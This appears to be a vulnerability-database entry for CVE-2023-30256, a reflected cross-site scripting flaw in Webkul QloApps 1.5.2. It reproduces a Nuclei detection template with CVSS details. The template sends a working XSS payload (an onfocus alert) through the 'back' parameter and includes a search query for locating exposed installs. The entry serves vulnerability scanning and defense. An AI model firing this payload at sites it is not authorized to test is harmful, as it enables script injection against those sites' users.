Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-30256
HistoryJul 07, 2023 - 9:38 a.m.

Webkul QloApps 1.5.2 - Cross-site Scripting

2023-07-0709:38:49
ProjectDiscovery
github.com
6
cve2023
packetstorm
xss
webkul-qloapps
unauth

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

5.9

Confidence

High

EPSS

0.011

Percentile

84.4%

Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.
id: CVE-2023-30256

info:
  name: Webkul QloApps 1.5.2 - Cross-site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/webkul/hotelcommerce
    - http://packetstormsecurity.com/files/172542/Webkul-Qloapps-1.5.2-Cross-Site-Scripting.html
    - https://github.com/ahrixia/CVE-2023-30256
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30256
    - https://qloapps.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-30256
    cwe-id: CWE-79
    epss-score: 0.00895
    epss-percentile: 0.8263
    cpe: cpe:2.3:a:webkul:qloapps:1.5.2:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: webkul
    product: qloapps
    fofa-query: title="qloapps"
  tags: cve2023,cve,packetstorm,xss,webkul-qloapps,unauth,webkul

http:
  - method: GET
    path:
      - "{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "xss onfocus=alert(document.domain) autofocus= xss"
          - "hasConfirmation"
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4a0a004730450220299c58ac9d6a22e1c49ef45f97057ebad174785e1ec42d9b942926d1a73e5dca022100a786b9078630f2acbfe99f890a7fc9e4f487ab208a16be633daefac19163d791:922c64590222798bb761d5b6d8e72950

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

5.9

Confidence

High

EPSS

0.011

Percentile

84.4%